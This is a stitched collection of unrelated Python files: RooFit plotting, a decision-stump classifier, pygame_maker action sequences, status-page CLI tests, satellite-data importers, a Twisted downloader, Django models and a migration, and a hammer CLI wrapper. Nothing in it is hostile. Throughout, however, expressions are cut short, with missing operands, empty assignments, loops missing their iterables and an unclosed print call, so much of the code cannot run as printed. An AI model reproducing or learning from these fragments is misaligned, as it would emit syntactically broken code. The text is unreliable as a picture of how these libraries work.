ROOT.RooFit.LineStyle( ROOT.kDashed), ROOT.RooFit.LineColor(ROOT.kRed)) # Plot multiple background components specified by object reference # Note that specified components may occur at any level in object tree # (e.g bkg is component of 'model' and 'sig2' is component 'sig') ras_bkg_sig2 = ROOT.RooArgSet(bkg, sig2) model.plotOn(xframe, ROOT.RooFit.Components(ras_bkg_sig2), ROOT.RooFit.LineStyle(ROOT.kDotted)) # Make component by name/regexp # ------------------------------------------------------------ # Plot single background component specified by name model.plotOn(xframe2, ROOT.RooFit.Components( "bkg"), ROOT.RooFit.LineColor(ROOT.kCyan)) # Plot multiple background components specified by name model.plotOn( xframe2, ROOT.RooFit.Components("bkg1,sig2"), ROOT.RooFit.LineStyle( ROOT.kDotted), ROOT.RooFit.LineColor( ROOT.kCyan)) # Plot multiple background components specified by regular expression on # name model.plotOn( xframe2, ROOT.RooFit.Components("sig*"), ROOT.RooFit.LineStyle( ROOT.kDashed), ROOT.RooFit.LineColor( ROOT.kCyan)) # Plot multiple background components specified by multiple regular # expressions on name model.plotOn( xframe2, ROOT.RooFit.Components("bkg1,sig*"), ROOT.RooFit.LineStyle( ROOT.kDashed), ROOT.RooFit.LineColor( ROOT.kYellow), ROOT.RooFit.Invisible()) # Draw the frame on the canvas c = ROOT.TCanvas("rf205_compplot", "rf205_compplot", 800, 400) c.Divide(2) ROOT.gPad.SetLeftMargin(0.15) xframe.GetYaxis().SetTitleOffset(1.4) xframe.Draw() ROOT.gPad.SetLeftMargin(0.15) xframe2.GetYaxis().SetTitleOffset(1.4) xframe2.Draw() c.SaveAs("rf205_compplot.png")
import math import numpy import operator class DecisionStump(): """ Class for a decision stump, adapted from pyclassic. """ def fit(self, X, Y, w): feature_index, stump = train_decision_stump(X,Y,w) self.feature_index = feature_index self.stump = stump return self def predict(self,X): if len(X.shape)==1: X = numpy.array([X]) N, d = X.shape feature_index = self.feature_index threshold = self.stump.threshold s = self.stump.s return s*(2.0*(X[:,feature_index]>threshold).astype(numpy.uint8)-1) class Stump: """1D stump""" def __init__(self, score, threshold, s): self.score = score self.threshold = threshold self.s = s def __cmp__(self, other): return cmp(self.err, other.err) def train_decision_stump(X,Y,w): stumps = [build_stump_1d(x,Y,w) for x in X.T] feature_index = numpy.argmax([s.score for s in stumps]) best_stump = stumps[feature_index] best_threshold = best_stump.threshold return feature_index, best_stump def build_stump_1d(x,y,w): idx = x.argsort() xsorted = x[idx] wy = y[idx]*w[idx] wy_pos = numpy.clip(wy, a_min=0, a_max=numpy.inf) wy_neg = numpy.clip(wy, a_min=-numpy.inf, a_max=0) score_left_pos = numpy.cumsum(wy_pos) score_right_pos = numpy.cumsum(wy_pos[::-1]) score_left_neg = numpy.cumsum(wy_neg) score_right_neg = numpy.cumsum(wy_neg[::-1]) score1 = -score_left_pos[0:-1:1] + score_right_neg[-2::-1] score2 = -score_left_neg[0:-1:1] + score_right_pos[-2::-1] # using idx will ensure that we don't split between nodes with identical x values idx = numpy.nonzero((xsorted[:-1] < xsorted[1:]).astype(numpy.uint8))[0] if len(idx)==0: return Stump(-numpy.inf, 0, 0) score = numpy.where(abs(score1)>abs(score2), score1, score2) ind = idx[numpy.argmax(abs(score[idx]))] maxscore = abs(score[ind]) threshold = (xsorted[ind] + xsorted[ind+1])/2.0 s = numpy.sign(score[ind]) # direction of -1 -> 1 change return Stump(maxscore, threshold, s)
""" Author: Ron Lockwood-Childs Licensed under LGPL v2.1 (see file COPYING for details) Container type for sequences of actions. """ import re from pygame_maker.actions.action import Action, ActionException __all__ = ["ActionSequence", "ActionSequenceStatement", "ActionSequenceConditional", "ActionSequenceConditionalIf", "ActionSequenceConditionalElse", "ActionSequenceBlock", "ActionSequenceStatementException"] class ActionSequenceStatementException(Exception): """ Raised when unknown action names or something other than an action is found in a sequence, when sequence statements are placed incorrectly, or when an attempt is made to add something other than an ActionSequenceStatement to a sequence. """ pass class ActionSequenceStatement(object): """ The base class for all action sequence statements. A "statement" wraps an action and provides structure to represent if/else conditionals and blocks along with normal executable statements. :param action: The action to wrap into the statement :type action: Action """ @staticmethod def get_sequence_item_from_action(action, **kwargs): """ Given a name or Action, retrieve its ActionSequenceStatement. Provide a simple static method to retrieve the right statement representing the given action: if/else condition, block, or executable statement. Can also accept a string containing the name of the action, in which case a new action will be retrieved with its parameters filled in with the supplied kwargs. :param action: An action name, or Action instance :type action: str|Action :param kwargs: Optional keyword arguments to apply to the named action :return: The appropriate action sequence statement :rtype: ActionSequenceStatement """ # if given a string, see if it names a known action new_action = None if isinstance(action, str): try: new_action = Action.get_action_instance_by_name(action, **kwargs) except ActionException: raise ActionSequenceStatementException("'{}' is not a known action".format(action)) else: new_action = action if not isinstance(new_action, Action): raise ActionSequenceStatementException("'{}' is not a recognized action") if new_action.nest_adjustment: if == "else": return ActionSequenceConditionalElse(new_action) minfo = if minfo: return ActionSequenceConditionalIf(new_action) if new_action.nest_adjustment != "block_end": return ActionSequenceBlock(new_action) return ActionSequenceStatement(new_action) def __init__(self, action): self.is_block = False self.is_conditional = False self.action = action def get_action_list(self): """ Return the statement's action list. This method places the action inside a list of length 1. This aids with unit testing, and it allows an action sequence to be serialized to storage. The deserialized simple list can be expanded into an action sequence when the application starts up. :return: A single-element list containing the wrapped action :rtype: list """ return [self.action] def pretty_print(self, indent=0): """ Display the name of the wrapped action as indented code :param indent: Number of spaces to indent :type indent: int """ indent_string = "\t" * indent print("{}{}".format(indent_string, def __repr__(self): return "<{}: {}>".format(type(self).__name__, self.action) class ActionSequenceConditional(ActionSequenceStatement): """ Represent a simple conditional ('else' is the only kind this fits). :param action: The action to wrap into the conditional :type action: Action """ def __init__(self, action): ActionSequenceStatement.__init__(self, action) self.is_conditional = True self.contained_statement = None def add_statement(self, statement): """ Attempt to add a statement to the conditional. Given a statement, try to add it to the current conditional. If the clause is empty, set its statement. If the clause holds an open block or conditional, pass it on. :param statement: New statement to add to the conditional :type statement: ActionSequenceStatement :return: True if there was room for the new statement, otherwise False :rtype: bool """ found_place = True # basic type check if not isinstance(statement, ActionSequenceStatement): raise ActionSequenceStatementException if not self.contained_statement: # the statement is now the conditional clause self.contained_statement = statement elif (self.contained_statement.is_block and not self.contained_statement.is_block_closed): # the statement fits within the conditional clause's block self.contained_statement.add_statement(statement) elif (self.contained_statement.is_conditional and self.contained_statement.add_statement(statement)): # the contained conditional found a place for the statement pass else: found_place = False return found_place def get_action_list(self): """ Collect the conditional's list of actions. This method retrieves all the collected statements inside a simple conditional into a simple list. This aids with unit testing and allows an action sequence to be serialized to storage. The deserialized simple list can be expanded into an action sequence when the application starts up. :return: A list containing the conditional's wrapped actions :rtype: list """ contained_list = [] if self.contained_statement: contained_list = self.contained_statement.get_action_list() return [self.action] + contained_list def pretty_print(self, indent=0): """ Display an action sequence simple conditional as indented code :param indent: Number of spaces to indent :type indent: int """ ActionSequenceStatement.pretty_print(self, indent) if self.contained_statement: self.contained_statement.pretty_print(indent+1) def __repr__(self): repr_str = "<{}:\n".format(type(self).__name__) repr_str += "\t{}>".format(self.contained_statement) return repr_str class ActionSequenceConditionalIf(ActionSequenceConditional): """ Represent an entire if/else conditional. The 'else' clause is also placed here, to avoid having to search earlier statements to see if there is a free 'if' conditional that matches the 'else'. :param action: The action to wrap into the 'if' conditional :type action: Action """ def __init__(self, action): ActionSequenceConditional.__init__(self, action) self.else_condition = None def add_statement(self, statement): """ Attempt to place the given statement into the clause for the 'if'. If there is already a block or another conditional, see if the new statement will be accepted there. If not, check whether the new statement is an 'else' condition, and that no 'else' condition already exists. If there is an 'else' condition that hasn't received a statement yet, add it there. If the 'else' statement exists and contains another conditional or block, see if the new statement will be accepted there. :param statement: New statement to add to the conditional :type statement: ActionSequenceStatement :return: True if there was room for the new statement, otherwise False :rtype: bool """ found_place = True if not ActionSequenceConditional.add_statement(self, statement): if (not self.else_condition and isinstance(statement, ActionSequenceConditionalElse)): self.else_condition = statement elif (self.else_condition and self.else_condition.is_conditional and self.else_condition.add_statement(statement)): # else clause had a place for the new statement pass elif (self.else_condition and self.else_condition.is_block and not self.else_condition.is_block_closed): self.else_condition.add_statement(statement) else: found_place = False return found_place def pretty_print(self, indent=0): """ Display an action sequence if/else conditional as indented code. :param indent: Number of spaces to indent :type indent: int """ ActionSequenceConditional.pretty_print(self, indent) if self.else_condition: self.else_condition.pretty_print(indent) def walk(self): """ Iterate through each action within a Conditional. :return: Generator function :rtype: generator """ yield self.action conditional_path = None if self.action.action_result: if not self.contained_statement: # incomplete "if" path (can only happen to final action in list) return conditional_path = self.contained_statement else: if not self.else_condition: # "if" not executed, and no "else" path return # no need to return the "else" action itself, it does nothing conditional_path = self.else_condition.contained_statement if conditional_path.is_block or conditional_path.is_conditional: for action in conditional_path.walk(): yield action else: yield conditional_path.action def get_action_list(self): """ Collect the conditional's list of actions. This method retrieves all the collected statements inside a conditional into a simple list. This aids with unit testing and allows an action sequence to be serialized to storage. The deserialized simple list can be expanded into an action sequence when the application starts up. :return: A list of the actions wrapped in the If conditional :rtype: list """ contained_list = ActionSequenceConditional.get_action_list(self) else_list = [] if self.else_condition: else_list = self.else_condition.get_action_list() return contained_list + else_list def __repr__(self): repr_str = "<{} {}:\n".format(type(self).__name__, self.action) repr_str += "\t{}\n".format(self.contained_statement) if self.else_condition: repr_str += "{}>".format(self.else_condition) return repr_str class ActionSequenceConditionalElse(ActionSequenceConditional): """ Clone of the ActionSequenceConditional class. Named for convenience to be used in a ActionSequenceConditionalIf. :param action: The action to wrap into the 'else' conditional :type action: Action """ def __init__(self, action): ActionSequenceConditional.__init__(self, action) class ActionSequenceBlock(ActionSequenceStatement): """ Represent a block of action statements. All statements are placed into a block (even if just the 'main' block) or into conditionals within a block. The first action in the main block is set to None. :param action: Usually a start_of_block action :type action: Action|None :param main_block: True if this is the main (outermost) block :type main_blocK: bool """ def __init__(self, action, main_block=False): # main block doesn't start with an explicit action, so action==None # is ok. Remember this when trying to use self.action in any # methods, including superclasses! ActionSequenceStatement.__init__(self, action) self.is_block = True self.is_block_closed = False self.contained_statements = [] self.main_block = main_block def _append_statement(self, statement): # Called by add_statement() when an action is meant for this block. # # :param statement: New statement to add to the block # :type statement: ActionSequenceStatement # the main block is never explicitly "closed" if statement.action and statement.action.nest_adjustment == "block_end": if not self.main_block: self.is_block_closed = True self.contained_statements.append(statement) else: raise ActionSequenceStatementException("block_end cannot be added to a main block") elif isinstance(statement, ActionSequenceConditionalElse): raise ActionSequenceStatementException else: self.contained_statements.append(statement) def add_statement(self, statement): """ Add a new statement to an open block. The action sequence "magic" happens here. Normal statements, "if" conditionals and blocks can be added to the current block. Open conditionals (no clause yet) or blocks (no "block_end" action) can receive new statements. An "else" action can be attached to an "if" conditional. All statements exist either inside a block (there is always a "main" block) or a conditional. :param statement: New statement to add to the block :type statement: ActionSequenceStatement """ # print("Adding statement: {} .. ".format(statement)) if not isinstance(statement, ActionSequenceStatement): raise TypeError("{} is not an ActionSequenceStatement".format(str(statement))) last_statement = None if self.contained_statements: last_statement = self.contained_statements[-1] if last_statement and last_statement.is_conditional: # If the last statement's conditional is still open, this statement # belongs there. Otherwise, add it to this block if last_statement.add_statement(statement): # print("---> to last conditional") return if last_statement and last_statement.is_block: # If the last statement's block is still open, this statement # belongs there. Otherwise, add it to this block if not last_statement.is_block_closed: # print("---> to last block") last_statement.add_statement(statement) return # print("---> to current block") self._append_statement(statement) def get_action_list(self): """ Collect the conditional's list of actions. This method retrieves all the collected statements inside a block into a simple list. This aids with unit testing and allows an action sequence to be serialized to storage. The deserialized simple list can be expanded into an action sequence when the application starts up. :return: A list of the actions wrapped in the If conditional :rtype: list """ this_action = [] if not self.main_block: this_action = [self.action] contained_list = [] if self.contained_statements: for contained in self.contained_statements: contained_list += contained.get_action_list() return this_action + contained_list def pretty_print(self, indent=0): """ Display the action sequence block as indented code. :param indent: Number of spaces to indent :type indent: int """ new_indent = indent if not self.main_block: ActionSequenceStatement.pretty_print(self, indent) new_indent += 1 if self.contained_statements: for contained in self.contained_statements: if contained.action.nest_adjustment != "block_end": contained.pretty_print(new_indent) else: contained.pretty_print(indent) def walk(self): """ Iterate through each action within a block. :return: Generator function :rtype: generator """ for statement in self.contained_statements: if statement.action is None: continue if statement.action.nest_adjustment == "block_end": return if statement.is_conditional or statement.is_block: for sub_statement_action in statement.walk(): yield sub_statement_action else: yield statement.action def __repr__(self): repr_str = "<{}:\n".format(type(self).__name__) for statement in self.contained_statements: repr_str += "{}\n".format(statement) repr_str += ">" return repr_str class ActionSequence(object): """Store a sequence of actions, which runs when triggered by an event.""" FIRST_ITEM_RE = re.compile(r"^\s*([^ ])") @staticmethod def load_sequence_from_yaml_obj(sequence_repr): """ Create an event action sequence from its YAML representation. The expected format is as follows:: [{<action_name>: { <action_param>:<action_value>, .. }, ..., ] :param sequence_repr: The YAML object containing action sequence data :type sequence_repr: yaml.load() result :return: The action sequence described in the YAML object :rtype: ActionSequence """ new_sequence = None if sequence_repr: new_sequence = ActionSequence() for action_hash in sequence_repr: action_name = list(action_hash.keys())[0] action_params = {} if action_hash[action_name]: action_params.update(action_hash[action_name]) next_action = Action.get_action_instance_by_name(action_name, **action_params) # print("New action: {}".format(next_action)) new_sequence.append_action(next_action) return new_sequence def __init__(self): """Wrap the outermost ActionSequenceBlock.""" #: The main block, containing all actions in sequence self.main_block = ActionSequenceBlock(None, True) def append_action(self, action): """ Add a new action to the end of the sequence. :param action: The name of a defined action, or an Action instance :type action: str|Action """ statement = ActionSequenceStatement.get_sequence_item_from_action(action) self.main_block.add_statement(statement) def get_next_action(self): """ Iterate through every action in the ActionSequence. :return: Generator function :rtype: generator """ for next_action in self.main_block.walk(): if next_action is not None: yield next_action def to_yaml(self, indent=0): """ Produce the YAML representation of the action sequence. :param indent: Number of spaces to indent each line :type indent: int :return: YAML string :rtype: str """ action_list = self.main_block.get_action_list() sequence_yaml = "" for action in action_list: action_yaml_lines = action.to_yaml(indent).splitlines() for idx, aline in enumerate(action_yaml_lines): if idx == 0: sline = str(aline) minfo = # print("first item match for '{}': {}".format(aline, minfo)) if minfo: mpos = minfo.start(1) # print("match pos:{}".format(mpos)) sline = "{}- {}".format(aline[0:mpos], aline[mpos:]) else: sline = "- {}".format(aline) sequence_yaml += "{}\n".format(sline) else: sequence_yaml += " {}\n".format(aline) return sequence_yaml def pretty_print(self): """Print out properly-indented action sequence strings.""" self.main_block.pretty_print() def __repr__(self): return "{}".format(str(self.main_block))
# -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, unicode_literals import unittest from datetime import datetime from unittest import TestCase from mock import patch, Mock from click.testing import CliRunner from statuspage import cli, update, create, iter_systems, get_severity, SYSTEM_LABEL_COLOR from github import UnknownObjectException import codecs class CLITestCase(TestCase): def setUp(self): self.patcher = patch('statuspage.Github') = self.patcher.start() # setup mocked label self.label = Mock() self.label.color = "171717" = "Website" self.label1 = Mock() self.label1.color = "171717" = "API" = [self.label, self.label1] # set up mocked issue self.issue = Mock() self.issue.created_at = self.issue.state = "open" self.issue_label = Mock() self.issue_label.color = "FF4D4D" = "major outage" self.issue.get_labels.return_value = [self.issue_label, self.label] self.issue.user.login = "some-dude" self.comment = Mock() self.comment.user.login = "some-dude" self.issue.get_comments.return_value = [self.comment, ] self.issue1 = Mock() self.issue1.created_at = self.issue1.state = "open" self.issue1.user.login = "some-dude" self.issue1.get_labels.return_value = [self.issue_label, self.label1] self.issue1.get_comments.return_value = [self.comment, ] = [self.issue, self.issue1] self.template = Mock() self.template.decoded_content = b"some foo" self.template.content = codecs.encode(b"some other foo", "base64") = self.template = self.template self.collaborator = Mock() self.collaborator.login = "some-dude" = [self.collaborator,] = [self.collaborator,] def tearDown(self): self.patcher.stop() @patch("statuspage.run_update") def test_create(self, run_update): label = Mock() = [label,] runner = CliRunner() result = runner.invoke( create, ["--name", "testrepo", "--token", "token", "--systems", "sys1,sys2"] ) self.assertEqual(result.exit_code, 0)"token") @patch("statuspage.run_update") def test_create_org(self, run_update): runner = CliRunner() result = runner.invoke( create, ["--name", "testrepo", "--token", "token", "--systems", "sys1,sys2", "--org", "some"] ) self.assertEqual(result.exit_code, 0)"token")"some") def test_update(self): runner = CliRunner() result = runner.invoke(update, ["--name", "testrepo", "--token", "token"]) self.assertEqual(result.exit_code, 0)"token")"testrepo") def test_dont_update_when_nothing_changes(self): runner = CliRunner() self.template.content = codecs.encode(b"some foo", "base64") result = runner.invoke(update, ["--name", "testrepo", "--token", "token"]) self.assertEqual(result.exit_code, 0)"token")"testrepo") def test_update_org(self): runner = CliRunner() result = runner.invoke(update, ["--name", "testrepo", "--token", "token", "--org", "some"]) self.assertEqual(result.exit_code, 0)"token")"testrepo") def test_update_index_does_not_exist(self): = UnknownObjectException(status=404, data="foo") runner = CliRunner() result = runner.invoke(update, ["--name", "testrepo", "--token", "token"]) self.assertEqual(result.exit_code, 0)"token")"testrepo") branch='gh-pages', content='some foo', message='initial', path='/index.html' ) def test_update_non_labeled_issue_not_displayed(self): self.issue.get_labels.return_value = [] runner = CliRunner() result = runner.invoke(update, ["--name", "testrepo", "--token", "token"]) self.assertEqual(result.exit_code, 0) # make sure that get_comments is not called for the first issue but for the second self.issue.get_comments.assert_not_called() self.issue1.get_comments.assert_called_once_with() def test_update_non_colaborator_issue_not_displayed(self): self.issue.user.login = "some-other-dude" runner = CliRunner() result = runner.invoke(update, ["--name", "testrepo", "--token", "token"]) self.assertEqual(result.exit_code, 0) # make sure that get_comments is not called for the first issue but for the second self.issue.get_comments.assert_not_called() self.issue1.get_comments.assert_called_once_with() class UtilTestCase(TestCase): def test_iter_systems(self): label1 = Mock() label2 = Mock() = "website" label1.color = SYSTEM_LABEL_COLOR self.assertEqual( list(iter_systems([label1, label2])), ["website", ] ) self.assertEqual( list(iter_systems([label2])), [] ) def test_severity(self): label1 = Mock() label2 = Mock() label1.color = "FF4D4D" self.assertEqual( get_severity([label1, label2]), "major outage" ) label1.color = "000000" self.assertEqual( get_severity([label1, label2]), None ) if __name__ == '__main__': unittest.main()
import pyrat, os import logging from osgeo import gdal import glob import numpy as np class ENVISAT(pyrat.ImportWorker): """ Import of ENVISAT satellite data. **author:** Andreas Reigber\n **status:** --beta-- No metadata are extracted. Mostly untested! """ gui = {'menu': 'File|Import spaceborne', 'entry': 'ENVISAT'} para = [{'var': 'file', 'value': '', 'type': 'openfile', 'text': 'Product file (*.N1)'}] def __init__(self, *args, **kwargs): super(ENVISAT, self).__init__(*args, **kwargs) = "ENVISAT IMPORT" if len(args) == 1: self.file = args[0] def getsize(self, *args, **kwargs): self.ds = gdal.Open(self.file) if self.ds is not None: = [] for band in range(self.ds.RasterCount): + 1)) return self.ds.RasterYSize, self.ds.RasterXSize else: logging.error("ERROR: product directory not recognised!") return False, False def block_reader(self, *args, **kwargs): array = [] for band in array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize)) if len(array) == 1: return array[0] else: return array def close(self, *args, **kwargs): self.ds = None # correct according to GDAL manual!!?? def getmeta(self, *args, **kwargs): meta = {} meta['sensor'] = "ENVISAT" metain = self.ds.GetMetadata() meta.update(metain) for band in metain = band.GetMetadata() meta.update(metain) return meta @pyrat.docstringfrom(ENVISAT) def envisat(*args, **kwargs): return ENVISAT(*args, **kwargs).run(*args, **kwargs) class PALSAR(pyrat.ImportWorker): """ Import of PALSAR satellite data. Only level 1.1. and 1.5 are supported. **author:** Andreas Reigber\n **status:** --beta-- No metadata are extracted. Mostly untested! """ gui = {'menu': 'File|Import spaceborne', 'entry': 'PALSAR'} para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}] def __init__(self, *args, **kwargs): super(PALSAR, self).__init__(*args, **kwargs) = "PALSAR IMPORT" if len(args) == 1: self.dir = args[0] def getsize(self, *args, **kwargs): volfile = glob.glob(self.dir + "/VOL*") if len(volfile) > 0: self.ds = gdal.Open(volfile[0]) if self.ds is not None: = [] for band in range(self.ds.RasterCount): + 1)) return len(, self.ds.RasterYSize, self.ds.RasterXSize else: logging.error("ERROR: product directory not recognised!") return False, False else: logging.error("ERROR: volume file not found!") return False, False def block_reader(self, *args, **kwargs): array = [] for band in array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize)) out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype) for k in range(len(array)): out[k, ...] = array[k] out[~np.isfinite(out)] = 0 return out.squeeze() def close(self, *args, **kwargs): self.ds = None # correct according to GDAL manual!!?? def getmeta(self, *args, **kwargs): meta = {} meta['sensor'] = "PALSAR" metain = self.ds.GetMetadata() meta.update(metain) for band in metain = band.GetMetadata() meta.update(metain) return meta @pyrat.docstringfrom(PALSAR) def palsar(*args, **kwargs): return PALSAR(*args, **kwargs).run(*args, **kwargs) class Radarsat2(pyrat.ImportWorker): """ Import of Radarsat-2 satellite data. **author:** Andreas Reigber\n **status:** --beta-- No metadata are extracted. Mostly untested! """ gui = {'menu': 'File|Import spaceborne', 'entry': 'Radarsat-2'} para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}] def __init__(self, *args, **kwargs): super(Radarsat2, self).__init__(*args, **kwargs) = "RADARSAT-2 IMPORT" if len(args) == 1: self.dir = args[0] def getsize(self, *args, **kwargs): volfile = glob.glob(self.dir + "/product.xml") if len(volfile) > 0: self.ds = gdal.Open(volfile[0]) if self.ds is not None: = [] for band in range(self.ds.RasterCount): + 1)) return len(, self.ds.RasterYSize, self.ds.RasterXSize else: logging.error("ERROR: product directory not recognised!") return False, False else: logging.error("ERROR: product.xml file not found!") return False, False def block_reader(self, *args, **kwargs): array = [] for band in array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize)) out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype) for k in range(len(array)): out[k, ...] = array[k] out[~np.isfinite(out)] = 0 return out.squeeze() def close(self, *args, **kwargs): self.ds = None # correct according to GDAL manual!!?? def getmeta(self, *args, **kwargs): meta = {} meta['sensor'] = "Radarsat-2" metain = self.ds.GetMetadata() meta.update(metain) meta['CH_pol'] = [] for band in metain = band.GetMetadata() meta['CH_pol'].append(metain['POLARIMETRIC_INTERP']) meta.update(metain) return meta @pyrat.docstringfrom(Radarsat2) def radarsat2(*args, **kwargs): return Radarsat2(*args, **kwargs).run(*args, **kwargs) class Sentinel1(pyrat.ImportWorker): """ Very basic import of Sentinel-1 satellite data. The current driver uses GDAL and therefore does not perform debursting and combination of subswaths. This routine needs to be improved in future. **author:** Andreas Reigber\n **status:** --beta-- Mostly untested! """ gui = {'menu': 'File|Import spaceborne', 'entry': 'Sentinel-1 (primitive)'} para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}] def __init__(self, *args, **kwargs): super(Sentinel1, self).__init__(*args, **kwargs) = "SENTINEL-1 IMPORT" def reader(self, *args, **kwargs): volfile = glob.glob(self.dir + "/") if len(volfile) > 0: self.ds = gdal.Open(volfile[0]) if self.ds is not None: = [] for band in range(self.ds.RasterCount): + 1)) nswath = len( YSize = [band.YSize for band in] XSize = [band.XSize for band in] else: logging.error("ERROR: product directory not recognised!") return False, False else: logging.error("ERROR: file not found!") return False, False array = [] for band in array.append(band.ReadAsArray()) meta = {} meta['sensor'] = "Sentinel-1" metain = self.ds.GetMetadata() meta.update(metain) return array, meta def close(self, *args, **kwargs): self.ds = None # correct according to GDAL manual!!?? def sentinel1(*args, **kwargs): return Sentinel1(*args, **kwargs).run(*args, **kwargs)
from twisted.web import client from twisted.internet import reactor, defer, ssl from urlparse import urlparse class HTTPProgressDownloader(client.HTTPDownloader): def __init__(self, url, outfile, headers = None): client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent='STB HTTP Downloader') self.status = None self.progress_callback = None self.deferred = defer.Deferred() def noPage(self, reason): if self.status == '304': print reason.getErrorMessage(), '') else: client.HTTPDownloader.noPage(self, reason) def gotHeaders(self, headers): if self.status == '200': if headers.has_key('content-length'): self.totalbytes = int(headers['content-length'][0]) else: self.totalbytes = 0 self.currentbytes = 0.0 return client.HTTPDownloader.gotHeaders(self, headers) def pagePart(self, packet): if self.status == '200': self.currentbytes += len(packet) if self.totalbytes and self.progress_callback: self.progress_callback(self.currentbytes, self.totalbytes) return client.HTTPDownloader.pagePart(self, packet) def pageEnd(self): return client.HTTPDownloader.pageEnd(self) class downloadWithProgress: def __init__(self, url, outputfile, contextFactory = None, *args, **kwargs): parsed = urlparse(url) scheme = parsed.scheme host = parsed.hostname port = parsed.port or (443 if scheme == 'https' else 80) self.factory = HTTPProgressDownloader(url, outputfile, *args, **kwargs) if scheme == 'https': from twisted.internet import ssl if contextFactory is None: contextFactory = ssl.ClientContextFactory() self.connection = reactor.connectSSL(host, port, self.factory, contextFactory) else: self.connection = reactor.connectTCP(host, port, self.factory) def start(self): return self.factory.deferred def stop(self): print '[stop]' self.connection.disconnect() def addProgress(self, progress_callback): print '[addProgress]' self.factory.progress_callback = progress_callback
from django.db import models class Timetable(models.Model): DW_MON = 0 DW_TUE = 1 DW_WED = 2 DW_THU = 3 DW_FRI = 4 DAY_OF_WEEK_CHOICES = ( (DW_MON, 'Monday'), (DW_TUE, 'Tuesday'), (DW_WED, 'Wednesday'), (DW_THU, 'Thursday'), (DW_FRI, 'Friday'), ) day_of_week = models.IntegerField(choices=DAY_OF_WEEK_CHOICES, null=False, blank=False) start_time = models.TimeField(null=False, blank=False) end_time = models.TimeField(null=False, blank=False) break_start_time = models.TimeField(null=False, blank=False) break_end_time = models.TimeField(null=False, blank=False) doctor = models.ForeignKey('clinic.Doctor', on_delete=models.CASCADE) def __str__(self): return 'Timetable for "%s" %s %s-%s (%s-%s)' % ( str(, dict(Timetable.DAY_OF_WEEK_CHOICES)[self.day_of_week], self.start_time, self.end_time, self.break_start_time, self.break_end_time, ) class Meta: unique_together = [ ['doctor', 'day_of_week'], ]
import unittest class MathopTest(unittest.TestCase): CLASS = None def setUp(self): if self.CLASS is None: raise unittest.SkipTest("Base class not tested") def test_should_chain_computation(self): self.assertEqual(repr(self.CLASS(5)), "<MathOp 5>") self.assertEqual(repr(self.CLASS(5).mul(2)), "<MathOp 10>") self.assertEqual(repr(self.CLASS(5).mul(2).add(17)), "<MathOp 27>") self.assertEqual(repr(self.CLASS(5).mul(2).add(17).sub(4)), "<MathOp 23>") self.assertEqual(repr(self.CLASS(5).mul(2).div(2)), "<MathOp 5>") def test_should_chain_nan(self): self.assertEqual(repr(self.CLASS(5).div(0)), "<MathOp NaN>") self.assertEqual(repr(self.CLASS(5).div(0).mul(2)), "<MathOp NaN>") self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17)), "<MathOp NaN>") self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17).sub(4)), "<MathOp NaN>") from monads.mathop import step1, step2_1, step2_2, step3, step4 class TestStep1(MathopTest): CLASS = step1.MathOp class TestStep2_1(MathopTest): CLASS = step2_1.MathOp class TestStep2_2(MathopTest): CLASS = step2_2.MathOp class TestStep3(MathopTest): CLASS = step3.MathOp class TestStep4(MathopTest): CLASS = step4.MathOp
# -*- encoding: utf-8 -*- """ Usage:: hammer activation-key [OPTIONS] SUBCOMMAND [ARG] ... Parameters:: SUBCOMMAND subcommand [ARG] ... subcommand arguments Subcommands:: add-host-collection Associate a resource add-subscription Add subscription content-override Override product content defaults copy Copy an activation key create Create an activation key delete Destroy an activation key host-collections List associated host collections info Show an activation key list List activation keys product-content List associated products remove-host-collection Disassociate a resource remove-subscription Remove subscription subscriptions List associated subscriptions update Update an activation key """ from robottelo.cli.base import Base class ActivationKey(Base): """Manipulates Katello's activation-key.""" command_base = 'activation-key' @classmethod def add_host_collection(cls, options=None): """Associate a resource""" cls.command_sub = 'add-host-collection' return cls.execute(cls._construct_command(options)) @classmethod def add_subscription(cls, options=None): """Add subscription""" cls.command_sub = 'add-subscription' return cls.execute(cls._construct_command(options)) @classmethod def content_override(cls, options=None): """Override product content defaults""" cls.command_sub = 'content-override' return cls.execute(cls._construct_command(options)) @classmethod def copy(cls, options=None): """Copy an activation key""" cls.command_sub = 'copy' return cls.execute(cls._construct_command(options)) @classmethod def host_collection(cls, options=None): """List associated host collections""" cls.command_sub = 'host-collections' return cls.execute(cls._construct_command(options)) @classmethod def product_content(cls, options=None): """List associated products""" cls.command_sub = 'product-content' return cls.execute(cls._construct_command(options)) @classmethod def remove_host_collection(cls, options=None): """Remove the associated resource""" cls.command_sub = 'remove-host-collection' return cls.execute(cls._construct_command(options)) @classmethod def remove_repository(cls, options=None): """Disassociate a resource""" cls.command_sub = 'remove-repository' return cls.execute(cls._construct_command(options)) @classmethod def remove_subscription(cls, options=None): """Remove subscription""" cls.command_sub = 'remove-subscription' return cls.execute(cls._construct_command(options)) @classmethod def subscriptions(cls, options=None): """List associated subscriptions""" cls.command_sub = 'subscriptions' return cls.execute(cls._construct_command(options))
# -*- coding: utf-8 -*- from __future__ import unicode_literals import django.db.models.deletion from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('newsletter', '0015_newsletterexternalarticlelink2'), ] operations = [ migrations.AlterField( model_name='newsletterarticlelink', name='article', field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wagtailcore.Page', help_text='Link to an internal article', null=True), ), migrations.AlterField( model_name='newslettereventlink', name='event', field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='events.EventPage', help_text='Link to an event', null=True), ), migrations.AlterField( model_name='newsletterexternalarticlelink', name='external_article', field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='articles.ExternalArticlePage', help_text='Link to an external article', null=True), ), ]
